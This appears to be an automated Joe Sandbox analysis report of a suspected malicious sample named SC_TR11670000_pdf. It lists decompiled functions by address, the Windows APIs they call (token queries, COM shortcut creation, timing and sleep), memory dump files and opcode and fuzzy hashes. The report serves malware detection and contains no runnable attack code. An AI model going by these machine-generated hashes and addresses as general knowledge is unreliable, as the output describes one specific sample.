                                                                          • SelectObject.GDI32(?,00000000), ref: 00AE139C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                          • String ID:
                                                                          • API String ID: 3225163088-0
                                                                          • Opcode ID: a131847c3b908001d029bbc27369447c25539c5af05acd15460c0e841515d202
                                                                          • Instruction ID: 0b89d42393cb608581bd8ca65b81d5e85d2d74006a87ea4fdf93366104a67f2a
                                                                          • Opcode Fuzzy Hash: a131847c3b908001d029bbc27369447c25539c5af05acd15460c0e841515d202
                                                                          • Instruction Fuzzy Hash: A12160B0900256EFDB108F26EC057A97BBDFB11721F184226F8109B1E0DBB99891DB90
                                                                          Function 00B3C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memcmp
                                                                          • String ID:
                                                                          • API String ID: 2931989736-0
                                                                          • Opcode ID: d2163d3ce5a9684874646cc4fa77f9cbf629a2a9a09df5fe0fa9f6a28731af51
                                                                          • Instruction ID: 4da7c571c91ca85e603397d853411738e6b78722d5eeacdd2cfb12f62d04f480
                                                                          • Opcode Fuzzy Hash: d2163d3ce5a9684874646cc4fa77f9cbf629a2a9a09df5fe0fa9f6a28731af51
                                                                          • Instruction Fuzzy Hash: 8D01B9726046057BD218A6645C52F7B7FDCDB213D4F1480A1FD14B6293EB61EE11A3E4
                                                                          Function 00B44D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00B44D5C
                                                                          • __beginthreadex.LIBCMT ref: 00B44D7A
                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00B44D8F
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B44DA5
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B44DAC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                          • String ID:
                                                                          • API String ID: 3824534824-0
                                                                          • Opcode ID: d1df664ec6a9f0fe3aaa2722c34c584d970eddd3505b5a4d1d5d1b23e0a67e81
                                                                          • Instruction ID: e27f1f5b792eea81f23f97dadcbbc2556c71c19cd2be221b9219f857bf0691a7
                                                                          • Opcode Fuzzy Hash: d1df664ec6a9f0fe3aaa2722c34c584d970eddd3505b5a4d1d5d1b23e0a67e81
                                                                          • Instruction Fuzzy Hash: 521108B2D04245BBC7119FA8EC04BAB7FECEB46320F1442B9F914D3291DBB58D1087A0
                                                                          Function 00B3874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B38766
                                                                          • GetLastError.KERNEL32(?,00B3822A,?,?,?), ref: 00B38770
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00B3822A,?,?,?), ref: 00B3877F
                                                                          • HeapAlloc.KERNEL32(00000000,?,00B3822A,?,?,?), ref: 00B38786
                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B3879D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 842720411-0
                                                                          • Opcode ID: 5d0e6bd4494906c63e6dd9779e41df2380384ad8e0eedc1c04933d706b98d2e4
                                                                          • Instruction ID: 93ef8699e65a717b676c4bfcc437ab95ff550f8e9eb576fbf32cbab62bda8b1f
                                                                          • Opcode Fuzzy Hash: 5d0e6bd4494906c63e6dd9779e41df2380384ad8e0eedc1c04933d706b98d2e4
                                                                          • Instruction Fuzzy Hash: CC014F71600205EFDB104FA5EC48D677BADFF86395B200469F949C3260DE758C10CA60
                                                                          Function 00B454E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B45502
                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B45510
                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B45518
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B45522
                                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B4555E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                          • String ID:
                                                                          • API String ID: 2833360925-0
                                                                          • Opcode ID: 4389b844d0347753cf5e079553695ea9eb01f8a7c2b99ace8590d6e90e07f61d
                                                                          • Instruction ID: 7de786e574efed333247297c9a5b81ecba3262e016c2898c56e4a613db46309c
                                                                          • Opcode Fuzzy Hash: 4389b844d0347753cf5e079553695ea9eb01f8a7c2b99ace8590d6e90e07f61d
                                                                          • Instruction Fuzzy Hash: 91010936D00A1EDBCF109BE8E888AFDBBB9FB19711F400096E905B2151DB745654DBA1
                                                                          Function 00B37652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?,?,?,00B3799D), ref: 00B3766F
                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?,?), ref: 00B3768A
                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?,?), ref: 00B37698
                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?), ref: 00B376A8
                                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?,?), ref: 00B376B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 3897988419-0
                                                                          • Opcode ID: a50a525222cfb2857c32c71201424e425fb65fcd8ba9538b2e0b534798071ce9
                                                                          • Instruction ID: 7c3cc9905375e8db397964e4806cea9867d0115d9a945e3b472ff736fc324252
                                                                          • Opcode Fuzzy Hash: a50a525222cfb2857c32c71201424e425fb65fcd8ba9538b2e0b534798071ce9
                                                                          • Instruction Fuzzy Hash: 5301B1B2604605BBDB208F99EC45AAA7BECEB44751F2040A8FD04D3211EF75DD0087A0
                                                                          Function 00B385F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B38608
                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B38612
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B38621
                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B38628
                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B3863E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: bcd8dc414f8079873e8c81cd30f8015ea36db8788162472c7c4063b395e2c1aa
                                                                          • Instruction ID: 944597a9d90be6f922da197278c37633567ca48de5a2fa01e5f5a3f3386a7238
                                                                          • Opcode Fuzzy Hash: bcd8dc414f8079873e8c81cd30f8015ea36db8788162472c7c4063b395e2c1aa
                                                                          • Instruction Fuzzy Hash: 50F04931241305AFEB100FA5EC8AE7B3BACEF8A794F100469FA49D7190CFA59C41DA61
                                                                          Function 00B38652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B38669
                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B38673
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B38682
                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B38689
                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B3869F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: 46d52ff915d62103fe86bb4d80a5300352aa4e00e586a1dc43ad1b73c1159fd5
                                                                          • Instruction ID: fe0662423256520705804e57f0e8d30e6af9a68b99a55758700e5eaca07566b3
                                                                          • Opcode Fuzzy Hash: 46d52ff915d62103fe86bb4d80a5300352aa4e00e586a1dc43ad1b73c1159fd5
                                                                          • Instruction Fuzzy Hash: 54F04FB1200305AFEB111FA5EC89E773BACEF8A754F200065F945D7190CEA9D941DA61
                                                                          Function 00B3C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00B3C6BA
                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B3C6D1
                                                                          • MessageBeep.USER32(00000000), ref: 00B3C6E9
                                                                          • KillTimer.USER32(?,0000040A), ref: 00B3C705
                                                                          • EndDialog.USER32(?,00000001), ref: 00B3C71F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 3741023627-0
                                                                          • Opcode ID: 770482a12882d8a54e2bdda421fbf91ffe9a7cdb82f215e11f41b0de9cca8187
                                                                          • Instruction ID: f036a800a66dac23d333ff3df05a24c539d141ea4f0b9b0e607cfd11d7cec952
                                                                          • Opcode Fuzzy Hash: 770482a12882d8a54e2bdda421fbf91ffe9a7cdb82f215e11f41b0de9cca8187
                                                                          • Instruction Fuzzy Hash: 8D014F30500705ABEB21AB64ED8EBA67BB8FB00745F1006A9F542A24E1DBE5AD54CF90
                                                                          Function 00AE13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EndPath.GDI32(?), ref: 00AE13BF
                                                                          • StrokeAndFillPath.GDI32(?,?,00B1BAD8,00000000,?), ref: 00AE13DB
                                                                          • SelectObject.GDI32(?,00000000), ref: 00AE13EE
                                                                          • DeleteObject.GDI32 ref: 00AE1401
                                                                          • StrokePath.GDI32(?), ref: 00AE141C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                          • String ID:
                                                                          • API String ID: 2625713937-0
                                                                          • Opcode ID: 3811e276d042b2e6a93f0eab4b10873850ee937fce218d860687b28765043c03
                                                                          • Instruction ID: c247d33ce331849defb4b50e7e2715744c18dbcc165954448e9dd4ddc82bd3b7
                                                                          • Opcode Fuzzy Hash: 3811e276d042b2e6a93f0eab4b10873850ee937fce218d860687b28765043c03
                                                                          • Instruction Fuzzy Hash: 4DF0FFB4004349EBDB155F26EC0D7683FA9A712726F08C226F4298A1F1CF794995DF51
                                                                          Function 00B4C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 00B4C69D
                                                                          • CoCreateInstance.OLE32(00B72D6C,00000000,00000001,00B72BDC,?), ref: 00B4C6B5
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                          • CoUninitialize.OLE32 ref: 00B4C922
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                          • String ID: .lnk
                                                                          • API String ID: 2683427295-24824748
                                                                          • Opcode ID: e903d99285bcb68e4232581a86fee3b0c74f3d70b4517f71832207c6edab0195
                                                                          • Instruction ID: 1463151c15a2d2e4ed3ad9989889e6f940f22dc6883d9466e5e532f0c27e5ff5
                                                                          • Opcode Fuzzy Hash: e903d99285bcb68e4232581a86fee3b0c74f3d70b4517f71832207c6edab0195
                                                                          • Instruction Fuzzy Hash: 3DA13DB1108345AFD700EF65C991EAFB7E8EF94744F00496CF1569B1A2EB70EA09CB52
                                                                          Function 00AF2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B00FF6: std::exception::exception.LIBCMT ref: 00B0102C
                                                                            • Part of subcall function 00B00FF6: __CxxThrowException@8.LIBCMT ref: 00B01041
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                            • Part of subcall function 00AE7BB1: _memmove.LIBCMT ref: 00AE7C0B
                                                                          • __swprintf.LIBCMT ref: 00AF302D
                                                                          Strings
                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AF2EC6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                          • API String ID: 1943609520-557222456
                                                                          • Opcode ID: 6a58fdcb3e53e29f798f4feb5a108b375378595ee822823e72185abc0449c77e
                                                                          • Instruction ID: 9ad0a96ad3f96fe8ea8b05c7dbfcb93cacc06d2eb795829139ef23f65868edb0
                                                                          • Opcode Fuzzy Hash: 6a58fdcb3e53e29f798f4feb5a108b375378595ee822823e72185abc0449c77e
                                                                          • Instruction Fuzzy Hash: 8F918D325083559FCB18EF64DA85C7EB7E4EF85740F00495EF9869B2A1EA20EE44CB52
                                                                          Function 00B4BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE48A1,?,?,00AE37C0,?), ref: 00AE48CE
                                                                          • CoInitialize.OLE32(00000000), ref: 00B4BC26
                                                                          • CoCreateInstance.OLE32(00B72D6C,00000000,00000001,00B72BDC,?), ref: 00B4BC3F
                                                                          • CoUninitialize.OLE32 ref: 00B4BC5C
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                          • String ID: .lnk
                                                                          • API String ID: 2126378814-24824748
                                                                          • Opcode ID: 7bb6ccc64516333738bc3caf8d5f506e2432236f45fb02a01ac7663abb6dfe7b
                                                                          • Instruction ID: f6357d2599319e39d0cc36befe0f5fc9026bd5a86ee31a4752455230402513fc
                                                                          • Opcode Fuzzy Hash: 7bb6ccc64516333738bc3caf8d5f506e2432236f45fb02a01ac7663abb6dfe7b
                                                                          • Instruction Fuzzy Hash: A4A154756043419FCB00DF25C584E6ABBE5FF88314F148998F99A9B3A2CB31EE45CB91
                                                                          Function 00B0524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00B052DD
                                                                            • Part of subcall function 00B10340: __87except.LIBCMT ref: 00B1037B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorHandling__87except__start
                                                                          • String ID: pow
                                                                          • API String ID: 2905807303-2276729525
                                                                          • Opcode ID: ebf5dee7f7a5d27c6ac60a8430355a4c6073794e1134fa6f854dc745e1f9ead2
                                                                          • Instruction ID: c3f0686ad4dde34c881bf8281b47e2eb12191facd80092f98a037301ef603311
                                                                          • Opcode Fuzzy Hash: ebf5dee7f7a5d27c6ac60a8430355a4c6073794e1134fa6f854dc745e1f9ead2
                                                                          • Instruction Fuzzy Hash: 8E513B21A2D60187D7317724D9813BF2FE4DF00750FA049D8E09A866E5EEB48CD49E4A
                                                                          Function 00B0023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
